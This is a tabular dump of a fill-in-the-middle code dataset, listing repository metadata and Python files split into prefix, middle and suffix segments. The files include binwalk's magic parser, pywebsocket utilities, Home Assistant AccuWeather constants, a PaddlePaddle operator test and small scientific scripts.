repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
kfollette/ASTR200-Spring2017
|
Homework/diff_int.py
|
Python
|
mit
| 441
| 0.022676
|
def diff_int(d=0.01*u.cm,a=0.001*u.cm,wl=400*u.nm):
'''
function that returns the i
|
ntensity of a double slit interference pattern
'''
theta = arange(-10,10,1e-5)*u.degree
x = pi*a*sin(theta)/wl*u.radian
xnew = x.decompose()
i_single = (sin(xnew)/xnew)**2
y = pi*d*sin(theta)/wl*u.radian
ynew = y.decompose()
i_double = (cos
|
(ynew))**2
I = i_single*i_double
plot(theta,I)
return
|
17twenty/binwalk
|
src/binwalk/core/parser.py
|
Python
|
mit
| 13,154
| 0.004485
|
# Code for performing minimal parsing of libmagic-compatible signature files.
# This allows for building a single signature file from multiple other signature files,
# and for parsing out the initial magic signature bytes for each signature (used for
# pre-processing of data to limit the number of actual calls into libmagic).
#
# Also performs splitting/formatting of libmagic result text.
import io
import re
import os.path
import tempfile
import binwalk.core.common
from binwalk.core.compat import *
from binwalk.core.filter import FilterType
class MagicSignature(object):
def __init__(self, **kwargs):
self.offset = 0
self.type = ''
self.condition = ''
self.description = ''
self.length = 0
for (k,v) in iterator(kwargs):
try:
v = int(v, 0)
except KeyboardInterrupt as e:
raise e
except Exception:
pass
setattr(self, k, v)
class MagicParser(object):
'''
Class for loading, parsing and creating libmagic-compatible magic files.
This class is primarily used internally by the Binwalk class, and a class instance of it is available via the Binwalk.parser object.
One useful method however, is file_from_string(), which will generate a temporary magic file from a given signature string:
import binwalk
bw = binwalk.Binwalk()
# Create a temporary magic file that contains a single entry with a signature of '\\x00FOOBAR\\xFF', and append the resulting
# temporary file name to the list of magic files in the Binwalk class instance.
bw.magic_files.append(bw.parser.file_from_string('\\x00FOOBAR\\xFF', display_name='My custom signature'))
bw.scan('firmware.bin')
All magic files generated by this class will be deleted when the class deconstructor is called.
'''
BIG_ENDIAN = 'big'
LITTLE_ENDIAN = 'little'
MAGIC_STRING_FORMAT = "%d\tstring\t%s\t%s\n"
DEFAULT_DISPLAY_NAME = "Raw string signature"
WILDCARD = 'x'
# If libmagic returns multiple results, they are delimited with this string.
RESULT_SEPERATOR = "\\012- "
def __init__(self, filter=None, smart=None):
'''
Class constructor.
@filter - Instance of the MagicFilter class. May be None if the parse/parse_file methods are not used.
@smart - Instance of the SmartSignature class. May be None if the parse/parse_file methods are not used.
Returns None.
'''
self.matches = set([])
self.signatures = {}
self.filter = filter
self.smart = smart
self.raw_fd = None
self.signature_count = 0
self.signature_set = set()
def __del__(self):
try:
self.cleanup()
except KeyboardInterrupt as e:
raise e
except Exception:
pass
def rm_magic_files(self):
'''
Cleans up the temporary magic file(s).
Returns None.
'''
try:
self.fd.close()
except KeyboardInterrupt as e:
raise e
except Exception:
pass
try:
self.raw_fd.close()
except KeyboardInterrupt as e:
raise e
except Exception:
pass
def cleanup(self):
'''
Cleans up any tempfiles created by the class instance.
Returns None.
'''
self.rm_magic_files()
def file_from_string(self, signature_string, offset=0, display_name=DEFAULT_DISPLAY_NAME):
'''
Generates a magic file from a signature string.
This method is intended to be used once per instance.
If invoked multiple times, any previously created magic files will be closed and deleted.
@signature_string - The string signature to search for.
@offset - The offset at which the signature should occur.
@display_name - The text to display when the signature is found.
Returns the name of the generated temporary magic file.
'''
self.raw_fd = tempfile.NamedTemporaryFile()
self.raw_fd.write(str2bytes(self.MAGIC_STRING_FORMAT % (offset, signature_string, display_name)))
self.raw_fd.seek(0)
return self.
|
raw_fd.name
def parse(self, file_name):
'''
Parses magic file(s) and contatenates them into a single temporary magic file
while simultaneously removing filtered signatures.
@file_name - Magic file, or list of magic files, to parse.
Returns the name of the generated temporary magic file, which will be automatically
deleted when the class deconstructor is called.
'''
self.matches = set([])
self.signatures = {}
|
self.signature_count = 0
self.fd = tempfile.NamedTemporaryFile()
if isinstance(file_name, type([])):
files = file_name
else:
files = [file_name]
for fname in files:
if fname:
if os.path.exists(fname) and os.path.isfile(fname):
self.parse_file(fname)
else:
binwalk.core.common.warning("Magic file '%s' does not exist!" % fname)
self.fd.seek(0)
return self.fd.name
def parse_file(self, file_name):
'''
Parses a magic file and appends valid signatures to the temporary magic file, as allowed
by the existing filter rules.
@file_name - Magic file to parse.
Returns None.
'''
# Default to not including signature entries until we've
# found what looks like a valid entry.
include = False
line_count = 0
try:
fp = open(file_name, 'rb')
for line in fp.readlines():
line = bytes2str(line)
line_count += 1
# Check if this is the first line of a signature entry
entry = self._parse_line(line)
if entry is not None:
# If this signature is marked for inclusion, include it.
if self.filter.filter(entry.description) == FilterType.FILTER_INCLUDE:
include = True
self.signature_count += 1
if not has_key(self.signatures, entry.offset):
self.signatures[entry.offset] = []
if entry.condition not in self.signatures[entry.offset]:
self.signatures[entry.offset].append(entry.condition)
else:
include = False
# Keep writing lines of the signature to the temporary magic file until
# we detect a signature that should not be included.
if include:
self.fd.write(str2bytes(line))
fp.close()
self.build_signature_set()
except KeyboardInterrupt as e:
raise e
except Exception as e:
raise Exception("Error parsing magic file '%s' on line %d: %s" % (file_name, line_count, str(e)))
def _parse_line(self, line):
'''
Parses a signature line into its four parts (offset, type, condition and description),
looking for the first line of a given signature.
@line - The signature line to parse.
Returns a dictionary with the respective line parts populated if the line is the first of a signature.
Returns a dictionary with all parts set to None if the line is not the first of a signature.
'''
entry = MagicSignature()
# Quick and dirty pre-filter. We are only concerned with the first line of a
# signature, which will always start with a number. Make sure the first byte of
# the line is a number; if not, don't process.
if line[:1] < '0' or line[:1] > '9':
return None
try:
# Split the line into white-space separated parts.
# For this to
|
CyanogenMod/android_external_chromium-trace
|
trace-viewer/third_party/pywebsocket/src/mod_pywebsocket/util.py
|
Python
|
bsd-3-clause
| 16,267
| 0.000184
|
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket utilities.
"""
import array
import errno
# Import hash classes from a module available and recommended for each Python
# version and re-export those symbol. Use sha and md5 module in Python 2.4, and
# hashlib module in Python 2.6.
try:
import hashlib
md5_hash = hashlib.md5
sha1_hash = hashlib.sha1
except ImportError:
import md5
import sha
md5_hash = md5.md5
sha1_hash = sha.sha
import StringIO
import logging
import os
import re
import socket
import traceback
import zlib
def get_stack_trace():
"""Get the current stack trace as string.
This is needed to support Python 2.3.
TODO: Remove this when we only support Python 2.4 and above.
Use traceback.format_exc instead.
"""
out = StringIO.StringIO()
traceback.print_exc(file=out)
return out.getvalue()
def prepend_message_to_exception(message, exc):
"""Prepend message to the exception."""
exc.args = (message + str(exc),)
return
def __translate_interp(interp, cygwin_path):
"""Translate interp program path for Win32 python to run cygwin program
(e.g. perl). Note that it doesn't support path that contains space,
which is typically true for Unix, where #!-script is written.
For Win32 python, cygwin_path is a directory of cygwin binaries.
Args:
interp: interp command line
cygwin_path: directory name of cygwin binary, or None
Returns:
translated interp command line.
"""
if not cygwin_path:
return interp
m = re.match('^[^ ]*/([^ ]+)( .*)?', interp)
if m:
cmd = os.path.join(cygwin_path, m.group(1))
return cmd + m.group(2)
return interp
def get_script_interp(script_path, cygwin_path=None):
"""Gets #!-interpreter command line from the script.
It also fixes command path. When Cygwin Python is used, e.g. in WebKit,
it could run "/usr/bin/perl -wT hello.pl".
When Win32 Python is used, e.g. in Chromium, it couldn't. So, fix
"/usr/bin/perl" to "<cygwin_path>\perl.exe".
Args:
script_path: pathname of the script
cygwin_path: directory name of cygwin binary, or None
Returns:
#!-interpreter command line, or None if it is not #!-script.
"""
fp = open(script_path)
line = fp.readline()
fp.close()
m = re.match('^#!(.*)', line)
if m:
return __translate_interp(m.group(1), cygwin_path)
return None
def wrap_popen3_for_win(cygwin_path):
"""Wrap popen3 to support #!-script on Windows.
Args:
cygwin_path: path for cygwin binary if command path is needed to be
translated. None if no translation required.
"""
__orig_popen3 = os.popen3
def __wrap_popen3(cmd, mode='t', bufsize=-1):
cmdline = cmd.split(' ')
interp = get_script_interp(cmdline[0], cygwin_path)
if interp:
cmd = interp + ' ' + cmd
return __orig_popen3(cmd, mode, bufsize)
os.popen3 = __wrap_popen3
def hexify(s):
return ' '.join(map(lambda x: '%02x' % ord(x), s))
def get_class_logger(o):
return logging.getLogger(
'%s.%s' % (o.__class__.__module__, o.__class__.__name__))
class NoopMasker(object):
"""A masking object that has the same interface as RepeatedXorMasker but
just returns the string passed in without making any change.
"""
def __init__(self):
pass
def mask(self, s):
return s
class RepeatedXorMasker(object):
"""A masking object that applies XOR on the string given to mask method
with the masking bytes given to the constructor repeatedly. This object
remembers the
|
position in the masking bytes the last mask method call
ended and resumes from that point on the next mask method call.
"""
def __init__(self, mask):
self._mask = map(ord, mask)
self._mask_size = len(self._mask)
self._count = 0
def mask(self, s):
resu
|
lt = array.array('B')
result.fromstring(s)
# Use temporary local variables to eliminate the cost to access
# attributes
count = self._count
mask = self._mask
mask_size = self._mask_size
for i in xrange(len(result)):
result[i] ^= mask[count]
count = (count + 1) % mask_size
self._count = count
return result.tostring()
class DeflateRequest(object):
"""A wrapper class for request object to intercept send and recv to perform
deflate compression and decompression transparently.
"""
def __init__(self, request):
self._request = request
self.connection = DeflateConnection(request.connection)
def __getattribute__(self, name):
if name in ('_request', 'connection'):
return object.__getattribute__(self, name)
return self._request.__getattribute__(name)
def __setattr__(self, name, value):
if name in ('_request', 'connection'):
return object.__setattr__(self, name, value)
return self._request.__setattr__(name, value)
# By making wbits option negative, we can suppress CMF/FLG (2 octet) and
# ADLER32 (4 octet) fields of zlib so that we can use zlib module just as
# deflate library. DICTID won't be added as far as we don't set dictionary.
# LZ77 window of 32K will be used for both compression and decompression.
# For decompression, we can just use 32K to cover any windows size. For
# compression, we use 32K so receivers must use 32K.
#
# Compression level is Z_DEFAULT_COMPRESSION. We don't have to match level
# to decode.
#
# See zconf.h, deflate.cc, inflate.cc of zlib library, and zlibmodule.c of
# Python. See also RFC1950 (ZLIB 3.3).
class _Deflater(object):
def __init__(self, window_bits):
self._logger = get_class_logger(self)
self._compress = zlib.compressobj(
zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -window_bits)
def compress_and_flush(self, bytes):
compressed_bytes = self._compress.compress(bytes)
compressed_bytes += self._compress.flush(zlib.Z_SYNC_FLUSH)
self._logger.debug('Compress input %r', bytes)
self._logger.debug('Compress result %r', compressed_bytes)
return compressed_bytes
class _Inflater(object):
def __init__(self):
self._logger = get_class_logger(self)
self._unconsumed = ''
self.reset()
def decompress(self, size):
if not (size == -1 or size > 0):
raise Exception('size must be -1 or positive')
data = ''
while True:
if size == -1:
data += self._decompress.decompress(self.
|
clairejaja/project-euler
|
src/main/python/problem2/even_fibonacci_numbers.py
|
Python
|
mit
| 876
| 0.001142
|
# Claire Jaja
# 11/1/2014
#
# Project Euler
# Problem 2
# Even Fibonacci numbers
#
# Each new term in the Fibonacci sequence is generated by adding
# the previous two terms.
# By starting with 1 and
|
2, the first 10 terms will be:
# 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, ...
# By considering the terms
|
in the Fibonacci sequence
# whose values do not exceed four million,
# find the sum of the even-valued terms.
def main():
max_value = 4000000
# set up first three terms
previous_previous_term = 1
previous_term = 1
current_term = 2
my_sum = 0
while current_term < max_value:
if current_term % 2 == 0:
my_sum += current_term
previous_previous_term = previous_term
previous_term = current_term
current_term = previous_term + previous_previous_term
print(my_sum)
if __name__ == "__main__":
main()
|
kennedyshead/home-assistant
|
homeassistant/components/accuweather/const.py
|
Python
|
apache-2.0
| 10,736
| 0
|
"""Constants for AccuWeather integration."""
from __future__ import annotations
from typing import Final
from homeassistant.components.weather import (
ATTR_CONDITION_CLEAR_NIGHT,
ATTR_CONDITION_CLOUDY,
ATTR_CONDITION_EXCEPTIONAL,
ATTR_CONDITION_FOG,
ATTR_CONDITION_HAIL,
ATTR_CONDITION_LIGHTNING,
ATTR_CONDITION_LIGHTNING_RAINY,
ATTR_CONDITION_PARTLYCLOUDY,
ATTR_CONDITION_POURING,
ATTR_CONDITION_RAINY,
ATTR_CONDITION_SNOWY,
ATTR_CONDITION_SNOWY_RAINY,
ATTR_CONDITION_SUNNY,
ATTR_CONDITION_WINDY,
)
from homeassistant.const import (
ATTR_DEVICE_CLASS,
ATTR_ICON,
CONCENTRATION_PARTS_PER_CUBIC_METER,
DEVICE_CLASS_TEMPERATURE,
LENGTH_FEET,
LENGTH_INCHES,
LENGTH_METERS,
LENGTH_MILLIMETERS,
PERCENTAGE,
SPEED_KILOMETERS_PER_HOUR,
SPEED_MILES_PER_HOUR,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
TIME_HOURS,
UV_INDEX,
)
from .model import SensorDescription
API_IMPERIAL: Final = "Imperial"
API_METRIC: Final = "Metric"
ATTRIBUTION: Final = "Data provided by AccuWeather"
ATTR_ENABLED: Final = "enabled"
ATTR_FORECAST: Final = "forecast"
ATTR_LABEL: Final = "label"
ATTR_UNIT_IMPERIAL: Final = "unit_imperial"
ATTR_UNIT_METRIC: Final = "unit_metric"
CONF_FORECAST: Final = "forecast"
COORDINATOR: Final = "coordinator"
DOMAIN: Final = "accuweather"
MANUFACTURER: Final = "AccuWeather, Inc."
MAX_FORECAST_DAYS: Final = 4
NAME: Final = "AccuWeather"
UNDO_UPDATE_LISTENER: Final = "undo_update_listener"
CONDITION_CLASSES: Final[dict[str, list[int]]] = {
ATTR_CONDITION_CLEAR_NIGHT: [33, 34, 37],
ATTR_CONDITION_CLOUDY: [7, 8, 38],
ATTR_CONDITION_EXCEPTIONAL: [24, 30, 31],
ATTR_CONDITION_FOG: [11],
ATTR_CONDITION_HAIL: [25],
ATTR_CONDITION_LIGHTNING: [15],
ATTR_CONDITION_LIGHTNING_RAINY: [16, 17, 41, 42],
ATTR_CONDITION_PARTLYCLOUDY: [3, 4, 6, 35, 36],
ATTR_CONDITION_POURING: [18],
ATTR_CONDITION_RAINY: [12, 13, 14, 26, 39, 40],
ATTR_CONDITION_SNOWY: [19, 20, 21, 22, 23, 43, 44],
ATTR_CONDITION_SNOWY_RAINY: [29],
ATTR_CONDITION_SUNNY: [1, 2, 5],
ATTR_CONDITION_WINDY: [32],
}
FORECAST_SENSOR_TYPES: Final[dict[str, SensorDescription]] = {
"CloudCoverDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-cloudy",
ATTR_LABEL: "Cloud Cover Day",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: False,
},
"CloudCoverNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-cloudy",
ATTR_LABEL: "Cloud Cover Night",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: False,
},
"Grass": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:grass",
ATTR_LABEL: "Grass Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"HoursOfSun": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-partly-cloudy",
ATTR_LABEL: "Hours Of Sun",
ATTR_UNIT_METRIC: TIME_HOURS,
ATTR_UNIT_IMPERIAL: TIME_HOURS,
ATTR_ENABLED: True,
},
"Mold": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:blur",
ATTR_LABEL: "Mold Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"Ozone": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:vector-triangle",
ATTR_LABEL: "Ozone",
ATTR_UNIT_METRIC: None,
ATTR_UNIT_IMPERIAL: None,
ATT
|
R_ENABLED
|
: False,
},
"Ragweed": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:sprout",
ATTR_LABEL: "Ragweed Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"RealFeelTemperatureMax": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Max",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: True,
},
"RealFeelTemperatureMin": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Min",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: True,
},
"RealFeelTemperatureShadeMax": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Shade Max",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"RealFeelTemperatureShadeMin": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Shade Min",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"ThunderstormProbabilityDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-lightning",
ATTR_LABEL: "Thunderstorm Probability Day",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: True,
},
"ThunderstormProbabilityNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-lightning",
ATTR_LABEL: "Thunderstorm Probability Night",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: True,
},
"Tree": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:tree-outline",
ATTR_LABEL: "Tree Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"UVIndex": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-sunny",
ATTR_LABEL: "UV Index",
ATTR_UNIT_METRIC: UV_INDEX,
ATTR_UNIT_IMPERIAL: UV_INDEX,
ATTR_ENABLED: True,
},
"WindGustDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Gust Day",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: False,
},
"WindGustNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Gust Night",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: False,
},
"WindDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Day",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: True,
},
"WindNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Night",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: True,
},
}
SENSOR_TYPES: Final[dict[str, SensorDescription]] = {
"ApparentTemperature": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "Apparent Temperature",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"Ceiling": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-fog",
ATTR_LABEL: "Cloud Ceiling",
ATTR_UNIT_METRIC: LENGTH_METERS,
ATTR_UNIT_IMPERIAL: LENGTH_FEET,
ATTR_ENABLED: True,
},
"CloudCover": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-cloudy",
ATTR_LABEL: "Cloud Cover",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: False,
},
"DewPoint": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEM
|
dallingham/regenerate
|
setup-win.py
|
Python
|
gpl-2.0
| 3,108
| 0.003861
|
from setuptools import setup
import py2exe
import os
import glob
__import__('gtk')
__import__('jinja2')
__import__('docutils')
setup_dict = dict(
name='regenerate',
version='1.0.0',
license='License.txt',
author='Donald N. Allingham',
author_email='[email protected]',
description='Register editor for ASIC/FPGA designs',
long_description='Allows users to manange registers for '
'ASIC and FPGA designs. Capable of generating Verilog '
'RTL, test code, C and assembler header files, and documentation.',
packages=[
"regenerate",
"regenerate.db",
"regenerate.importers",
"regenerate.extras",
"regenerate.settings",
"regenerate.ui",
"regenerate.writers"
],
package_dir={
"regenerate" : "regenerate",
},
package_data={
'regenerat
|
e' : [
"data/ui/*.ui",
"data/medi
|
a/*",
"data/help/*.rst",
"data/extra/*",
"data/*.*",
"writers/templates/*"
]
},
include_package_data=True,
url="https://github.com/dallingham/regenerate",
scripts=[
"bin/regenerate",
"bin/regbuild",
"bin/regupdate",
"bin/regxref",
"bin/regdiff"
],
classifiers=[
'Operating System :: POSIX', 'Programming Language :: Python :: 2.7',
'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)',
'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)'
],
windows=[
{
"script" : "bin/regenerate",
"icon_resources" : [(1, "regenerate/data/media/flop.ico")]
}
],
options={
'py2exe': {
'includes' : 'cairo, pango, pangocairo, atk, gobject, gio, gtk.keysyms, jinja2',
'skip_archive' : True,
'dll_excludes': [
'MSVCP90.dll',
'api-ms-win-core-string-l1-1-0.dll',
'api-ms-win-core-registry-l1-1-0.dll',
'api-ms-win-core-errorhandling-l1-1-1.dll',
'api-ms-win-core-string-l2-1-0.dll',
'api-ms-win-core-profile-l1-1-0.dll',
'api-ms-win-core-processthreads-l1-1-2.dll',
'api-ms-win-core-libraryloader-l1-2-1.dll',
'api-ms-win-core-file-l1-2-1.dll',
'api-ms-win-security-base-l1-2-0.dll',
'api-ms-win-eventing-provider-l1-1-0.dll',
'api-ms-win-core-heap-l2-1-0.dll',
'api-ms-win-core-libraryloader-l1-2-0.dll',
'api-ms-win-core-localization-l1-2-1.dll',
'api-ms-win-core-sysinfo-l1-2-1.dll',
'api-ms-win-core-synch-l1-2-0.dll',
'api-ms-win-core-heap-l1-2-0.dll']
}
},
)
setup(**setup_dict)
|
luotao1/Paddle
|
python/paddle/fluid/tests/unittests/test_fusion_seqpool_cvm_concat_op.py
|
Python
|
apache-2.0
| 4,299
| 0.000465
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
from test_reorder_lod_tensor import convert_to_offset
from sequence.test_sequence_pool import compute_seqpool_sum, compute_seqpool_avg, compute_seqpool_sqrt
from test_cvm_op import cvm_compute
class TestFusionSeqPoolCVMConcatOp(OpTest):
def setUp(self):
self.w = 11
self.use_cvm = True
self.lods = [[[2, 3, 5]], [[1, 5, 2]]]
self.set_conf()
self.set_pooltype()
self.op_type = 'fusion_seqpool_cvm_concat'
self.axis = 1
bs = len(self.lods[0][0])
inputs = []
outs = []
# The cvm variable is not actually used.
cvm = np.array([[0.6, 0.4]]).astype("float32")
i = 0
for lod in self.lods:
assert bs == len(lod[0]), 'All lod size should be equal'
x = np.random.uniform(0.1, 1,
[sum(lod[0]), self.w]).astype('float32')
offset = convert_to_offset(lod)
out = np.zeros((bs, self.w)).astype('float32')
if self.pooltype == "SUM":
compute_seqpool_sum(x, offset, out)
out = cvm_compute(out, self.w, self.use_cvm)
elif self.pooltype == "AVERAGE":
compute_seqpool_avg(x, offset, out)
out = cvm_compute(out, self.w, self.use_cvm)
elif self.pooltype == "SQRT":
compute_seqpool_sqrt(x, offset, out)
out = cvm_compute(out, self.w, self.use_cvm)
else:
raise Exception("Unsupported pool type!")
inputs.append(('x_{0}'.format(i), (x, lod)))
outs.append(out)
i = i + 1
self.inputs = {'X': inputs, "CVM": cvm}
self.outputs = {'Out': np.concatenate(outs, axis=se
|
lf.axis)}
self.attrs = {
'pooltype': self.pooltype,
'axis': self.axis,
}
def set_pooltype(self):
self.pooltype = "SUM"
d
|
ef set_conf(self):
pass
def test_check_output(self):
self.check_output()
class TestFusionSeqPoolCVMConcatOpCase1(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[1]]]
class TestFusionSeqPoolCVMConcatOpCase2(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[1]], [[1]], [[1]]]
class TestFusionSeqPoolCVMConcatOpCase3(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[1, 3, 4, 6]]]
self.w = 10
class TestFusionSeqPoolCVMConcatOpCase4(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[2, 13, 4]], [[1, 1, 1]], [[5, 3, 1]], [[9, 10, 3]]]
self.w = 3
## test avg pool and sqrt
def create_test_avg_sqrt_class(parent):
class TestSeqPoolAvgCase(parent):
def set_pooltype(self):
self.pooltype = "AVERAGE"
class TestSeqPoolSqrtCase(parent):
def set_pooltype(self):
self.pooltype = "SQRT"
cls_name_avg = "{0}_{1}".format(parent.__name__, "avg")
cls_name_sqrt = "{0}_{1}".format(parent.__name__, "sqrt")
TestSeqPoolAvgCase.__name__ = cls_name_avg
TestSeqPoolSqrtCase.__name__ = cls_name_sqrt
globals()[cls_name_avg] = TestSeqPoolAvgCase
globals()[cls_name_sqrt] = TestSeqPoolSqrtCase
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOp)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase1)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase2)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase3)
create_test_avg_sqrt_class(TestFusionSeqPoolCVMConcatOpCase4)
if __name__ == '__main__':
unittest.main()
|
DiCarloLab-Delft/PycQED_py3
|
pycqed/measurement/det_fncs/hard/SignalHound.py
|
Python
|
mit
| 5,908
| 0.000508
|
"""
SignalHound related detector functions
extracted from pycqed/measurement/detector_functions.py commit 0da380ad2adf2dc998f5effef362cdf264b87948
"""
import logging
import time
from packaging import version
import qcodes as qc
from pycqed.measurement.det_fncs.Base import Soft_Detector, Hard_Detector
from pycqed.measurement.waveform_control import pulse
from pycqed.measurement.waveform_control import element
from pycqed.measurement.waveform_control import sequence
# import instruments for type annotations
from pycqed.instrument_drivers.physical_instruments.USB_SA124B import SignalHound_USB_SA124B
log = logging.getLogger(__name__)
